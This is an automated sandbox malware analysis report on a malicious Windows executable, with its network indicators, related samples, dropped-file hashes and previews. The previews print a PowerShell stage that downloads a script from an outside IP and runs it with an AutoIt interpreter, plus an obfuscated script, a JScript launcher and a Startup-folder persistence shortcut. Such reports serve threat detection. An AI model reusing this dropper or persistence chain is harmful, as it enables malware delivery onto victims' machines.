                                              https://oneget.orgpowershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
139.99.188.124 | unknown | Canada | | 16276 | OVHFR | true
                                                IP
                                                127.0.0.1
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1577201
                                                Start date and time:2024-12-18 09:18:13 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 15s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:23
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:PPbimZI4LV.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:3e60030e11271225fcc4e95aeb70447577882c697b54eeb83d5b6957b9c4bda3.exe
                                                Detection:MAL
                                                Classification:mal100.expl.evad.winEXE@16/16@2/2
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 47
                                                • Number of non-executed functions: 238
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.190.177.20, 20.223.36.55, 13.107.246.63, 2.16.158.185, 20.12.23.50, 150.171.28.10, 2.16.158.176, 20.199.58.43
                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                • Execution Graph export aborted for target powershell.exe, PID 7496 because it is empty
                                                • Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:19:15 | API Interceptor | 80x Sleep call for process: powershell.exe modified
03:19:51 | API Interceptor | 2x Sleep call for process: svchost.exe modified
03:20:03 | API Interceptor | 2701x Sleep call for process: Guard.exe modified
03:20:21 | API Interceptor | 1637x Sleep call for process: SwiftWrite.pif modified
09:19:30 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Match | Associated Sample Name / URL | Detection | Threat Name | Context
139.99.188.124 | duyba.lnk.download.lnk | malicious | Unknown | 139.99.188.124/QWCheljD.txt
 | pt8GJiNZDT.exe | malicious | Unknown | 139.99.188.124/QWCheljD.txt
 | FwR7as4xUq.exe | malicious | Unknown | 139.99.188.124/EPDjSfs.txt
Match | Associated Sample Name / URL | Detection | Threat Name | Context
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | http://ngfreemessage-verifying.freewebhostmost.com/ | malicious | HTMLPhisher | 217.20.58.99
 | uEhN67huiV.dll | malicious | Unknown | 212.229.88.13
 | JkICQ13OOY.dll | malicious | Unknown | 217.20.56.100
 | V65xPrgEHH.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 217.20.58.99
 | BwQ1ZjHbt3.bat | malicious | Unknown | 217.20.57.23
 | payload_1.hta | malicious | RedLine | 217.20.58.100
 | 69633f.msi | malicious | Vidar | 217.20.58.98
 | msimg32.dll | malicious | RHADAMANTHYS | 217.20.58.100
 | Statement Of Account - (USD 19,490.00 ).xls | malicious | Unknown | 217.20.58.99
 | Statement Of Account - (USD 19,490.00 ).xls | malicious | Unknown | 217.20.58.98
ax-0001.ax-msedge.net | pt8GJiNZDT.exe | malicious | Unknown | 150.171.27.10
 | billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exe | malicious | Metasploit | 150.171.28.10
 | https://mail.donotreply.biz/XWW04VVZpU2JyWTFmVy96T2RUOUEvcEhyMWhFSm5uZElnVUlmb2dTZEdMRFdGSU1UV2V3S3RUNGdrNmNQRFJ4WTFPRHdYYlkraDV3S1YyVVpuU3E3K2p1bWowcEt3M24ySVBLanRDUkwyYitYWExuYTB5YlhVTUhySWZKbGJCTE9oRHl2RCtjR29BbEk3ZEwxZFJaNmNoK29ESk0vTGcxSmtyK0FWTExLWTdxYlQ1Yys1bjNiTUczY0RnPT0tLTU2R0pFM1VwZFRnVndZSWktLXptU2lWOHlQdjR0eGI1K09OQVZtRnc9PQ==?cid=2315575162 | malicious | KnowBe4 | 150.171.27.10
 | https://ce4.ajax.a8b.co/get?redir=1&id=d4vCW7zizPl1mo0GYx0ELgo+CCIybH9/c4qC7CeWEuI=&uri=//the-western-fire-chiefs-association.jimdosite.com | malicious | Unknown | 150.171.27.10
 | 174 Power Global_Enrollment_.docx.doc | malicious | Unknown | 150.171.27.10
 | nSs9QIsTua.js | malicious | Unknown | 150.171.27.10
 | http://uhsee.com | malicious | Unknown | 150.171.27.10
 | veOECiSunn.exe | malicious | Unknown | 150.171.27.10
 | V65xPrgEHH.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 150.171.28.10
Match | Associated Sample Name / URL | Detection | Threat Name | Context
OVHFR | duyba.lnk.download.lnk | malicious | Unknown | 139.99.188.124
 | pt8GJiNZDT.exe | malicious | Unknown | 139.99.188.124
 | x86_64.nn.elf | malicious | Mirai, Okiru | 54.36.60.244
 | jew.sh4.elf | malicious | Unknown | 51.75.58.223
 | https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPy | malicious | HTMLPhisher | 167.114.27.228
 | c2.exe | malicious | Xmrig | 51.79.145.144
 | Clienter.dll.dll | malicious | Unknown | 51.77.90.246
 | uEhN67huiV.dll | malicious | Unknown | 54.36.205.38
 | https://alluc.co/watch-movies/passengers.html | malicious | Unknown | 54.38.113.6
 | Clienter.dll.dll | malicious | Unknown | 94.23.76.52
                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\Public\Guard.exe | duyba.lnk.download.lnk | malicious | Unknown |
 | pt8GJiNZDT.exe | malicious | Unknown |
 | c2.hta | malicious | XWorm |
 | c2.hta | malicious | XWorm |
 | c2.hta | malicious | XWorm |
 | c2.hta | malicious | XWorm |
 | FwR7as4xUq.exe | malicious | Unknown |
 | InsertSr.exe | malicious | GO Backdoor |
 | vqMMwqCFZQ.exe | malicious | Unknown |
 | fT0L8msd6q.exe | malicious | Unknown |
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.7263338996759401
                                                                    Encrypted:false
                                                                    SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0a:9JZj5MiKNnNhoxur
                                                                    MD5:82882BA955554C944E85277B2C6CDF9D
                                                                    SHA1:364FDC8428C2CC3942A67216FB805F63DD8E2716
                                                                    SHA-256:2BD8A15E0D156D3769B4B46EA402CADE598044E2F0E807588402D37BCD60AD0C
                                                                    SHA-512:29662DC0C9B0F33EAB7BE820306D7EF2895D1B4D6F892F3464664B6B3EB6AAB3622F415C1B35EB973BCAA4D9F2BC0EE9E95D79AF3C4E572732A03169B795AE09
                                                                    Malicious:false
                                                                    Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage user DataBase, version 0x620, checksum 0x6e405cd4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.7555275648361202
                                                                    Encrypted:false
                                                                    SSDEEP:1536:9SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:9azaSvGJzYj2UlmOlOL
                                                                    MD5:4F593282F8251446A7BCE75C9720E1C6
                                                                    SHA1:52F61D01E8C8294A6BF6861B2248D0459C6692F2
                                                                    SHA-256:FE548F606767F1EDFE74581C309ABE78449F4B5F15DF257A63A24C9F1FAD6230
                                                                    SHA-512:DAD38E0FD48C32B1055DD51EB926C0E050A1D21185D5D5E7D1F7655BDB30C495D4E9CD7BCF3B9D61571B8CF31B71BD8CA4C0F8B639468361A51437BD593092D3
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.07778014207454474
                                                                    Encrypted:false
                                                                    SSDEEP:3:B2l8YemkItKg3NaAPaU1l/+33I//lAlluxmO+l/SNxOf:U8zPANDPaU4oAgmOH
                                                                    MD5:50F4BC925A483C75C787B27E88683148
                                                                    SHA1:596DD955656A5FCBD3529E2A3EFFAAA4198C7120
                                                                    SHA-256:EE9DACF4E2DE9F8EE380BD832C15850B5F07040E546BC28F689797D0D3E4B547
                                                                    SHA-512:30203E7DA60F16CE0907D0537B23835625806B9102471BF423440103D9A35F85EFF0B0CED6B4E65CCD5A8FFFA250ADDA59A20A27B0916027692052876CECB743
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):893608
                                                                    Entropy (8bit):6.62028134425878
                                                                    Encrypted:false
                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Joe Sandbox View:
                                                                    • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                                    • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: FwR7as4xUq.exe, Detection: malicious, Browse
                                                                    • Filename: InsertSr.exe, Detection: malicious, Browse
                                                                    • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                    • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\PPbimZI4LV.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):486
                                                                    Entropy (8bit):5.285750251320951
                                                                    Encrypted:false
                                                                    SSDEEP:12:f73/oq0FEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73//0CknZ9LzjYnRSb8Cba
                                                                    MD5:AA95E0199F34D4DF6435F1355734CF85
                                                                    SHA1:C7FBE30F45BEF5B44F33FCFAA43F2D12ACA8B34E
                                                                    SHA-256:79D76D69C3FBD6E210FF3A63A575B3CBBD09812446DD2B29BE44B6E9558C0C6A
                                                                    SHA-512:B5A69C9954CA9E0D371942BAA63D66450090AE11DA9CBC2F7B429FACA824D3C10DFDA9584192C59DE940E548883DBF816A128989DE4757B62DE421C14144CE72
                                                                    Malicious:true
                                                                    Preview:[string]$fU5L = "http://139.99.188.124/BlQMSgJx.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                    Category:dropped
                                                                    Size (bytes):1241207
                                                                    Entropy (8bit):5.144245135598002
                                                                    Encrypted:false
                                                                    SSDEEP:12288:28V+jcfSP7IkI/w9nx3EBbKBLtKMGFSbri2d:qcmx3amBRPbr5
                                                                    MD5:C721A93515EB1964215E0FFC37F2C7BD
                                                                    SHA1:F3D1EC4B6AC8FAC24CCDBB9F75366F820684171E
                                                                    SHA-256:E854405853875599752ED08E4683D578DE11C94C03AB048B2151ECA6AD93D911
                                                                    SHA-512:0BBC3C7F67081C6A4F53534C69F58E6164ABF1CDE8A4D44C7B19F9B4E5567C2819A5B6142AC468499D68ABB52F36B4AED9BB7D4B3F7BBEC8D263E0A0AA6B7970
                                                                    Malicious:true
                                                                    Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:ASCII text, with very long lines (1266)
                                                                    Category:dropped
                                                                    Size (bytes):1241204
                                                                    Entropy (8bit):5.144205154030587
                                                                    Encrypted:false
                                                                    SSDEEP:12288:D8V+jcfSP7IkI/w9nx3EBbKBLtKMGFSbri2d:Dcmx3amBRPbr5
                                                                    MD5:31D42ADDDD78A4B96BA7D0DB076E3994
                                                                    SHA1:6CE4AECB7419AA163ECDE7594FFAB9DF36A69A8D
                                                                    SHA-256:D79DA7F014F096CCC2719B6BC94CF446C6C98EAF98C2A6EA23CCD7EBDEE933ED
                                                                    SHA-512:7BC1BD0A7ADA641DC758073375C0595E1276F51BD65185731584FE06CE82EC296A8B85385B863AB7B2DADF0FE22B1D293C9647565EBC9641FE49D30FE8B5E7E7
                                                                    Malicious:false
                                                                    Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):190
                                                                    Entropy (8bit):4.702878525317735
                                                                    Encrypted:false
                                                                    SSDEEP:3:RiMIpGXfeNH5E5wWAX+eLCMuL4EkD5yKXW/Zi+0/RaMl85uWAX+eLCMuL4EkD5yn:RiJbNHCwWDeLPqJkDrXW/Zz0tl8wWDek
                                                                    MD5:ADD89CDE8D0D8247BA4058565F6AF1D1
                                                                    SHA1:BDE05EE487B598FC744EBE571202C8BDED415560
                                                                    SHA-256:49456CC7BEEF073EF45D3F3CA43AFFFB39A1885C386F8C24C29A7F3AA86A19AB
                                                                    SHA-512:15E9AB5071BB27D81BC6356AEA39BBD4F07C554E25B1984BE524DDDC86DC861950F5E18237D33A56A2397E30D700BFF22B338CE4F9B596A0F5BDD600A2F6E3DA
                                                                    Malicious:true
                                                                    Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):893608
                                                                    Entropy (8bit):6.62028134425878
                                                                    Encrypted:false
                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):101
                                                                    Entropy (8bit):4.882484479599994
                                                                    Encrypted:false
                                                                    SSDEEP:3:HRAbABGQaFyw3pYoN+E2J5yKXW/Zi+URAAy:HRYF5yjoN723yKXW/Zzyy
                                                                    MD5:E13AD229D874CB584EE9C5EAF00F02A5
                                                                    SHA1:99EFF6F0EFC61DCFDD83E19A7A88355E8D82BF77
                                                                    SHA-256:7448CB3A6A286F6BDF4F036DEAB44060B5E1E17368D2E1C560CCA5EEFEF342A1
                                                                    SHA-512:DB00B1447019348D5D90A1BD0A5E30FF60D0ED92E3308418B659D7B8B5796A04D4CF371D6824574E84F1ACB8D1CFC193E4B7F8EC3EE93862FF6F4C01012BD801
                                                                    Malicious:true
                                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):6.306442792199625
                                                                    TrID:
                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:PPbimZI4LV.exe
                                                                    File size:1'083'904 bytes
                                                                    MD5:a9e7a83dd50b78bad39a2a57cbebb137
                                                                    SHA1:c8634886fe1f814033d5303a29ed28909b8cea91
                                                                    SHA256:3e60030e11271225fcc4e95aeb70447577882c697b54eeb83d5b6957b9c4bda3
                                                                    SHA512:8d34ebb520e3d548e803c57ed85238cb4bab33b67098ea5f45de97cc43693566050181eccc8370df0bcb4f5c64a09ea3a876f2a64236f7c4c87fa62b28d1099e
                                                                    SSDEEP:24576:OrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tva91w:O2EYTb8atv1orq+pEiSDTj1VyvBar
                                                                    TLSH:46357C4973A4419DFEABE1B6CA23C607D6B17C490276861F01A47B767F337712A2E321
                                                                    File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG
                                                                    Icon Hash:0fd88dc89ea7861b
                                                                    Entrypoint:0x14002549c
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x140000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x674F007A [Tue Dec 3 12:58:34 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:2
                                                                    File Version Major:5
                                                                    File Version Minor:2
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:2
                                                                    Import Hash:fadc5a257419d2541a6b13dfb5e311e2
                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe5c10 | 0x17c | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfb000 | 0x140f4 | .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xf4000 | 0x6f48 | .pdata
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x110000 | 0xa74 | .reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc7050 | 0x1c | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0xd9aa0 | 0x28 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xc7070 | 0x100 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0xb5000 | 0x1138 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                    .text | 0x1000 | 0xb3328 | 0xb3400 | 507a8505198e35cc9675301d53e3b1c4 | False | 0.5503358721234309 | data | 6.5212967575920215 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata | 0xb5000 | 0x34204 | 0x34400 | 9eda36be0cf076085a2f9772c1ee5803 | False | 0.30884139503588515 | data | 5.360588077813426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data | 0xea000 | 0x9120 | 0x5000 | ec6b77d6ef8898b0d3b7d48c042d66a0 | False | 0.040673828125 | DOS executable (block device driver) | 0.5749243362866429 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
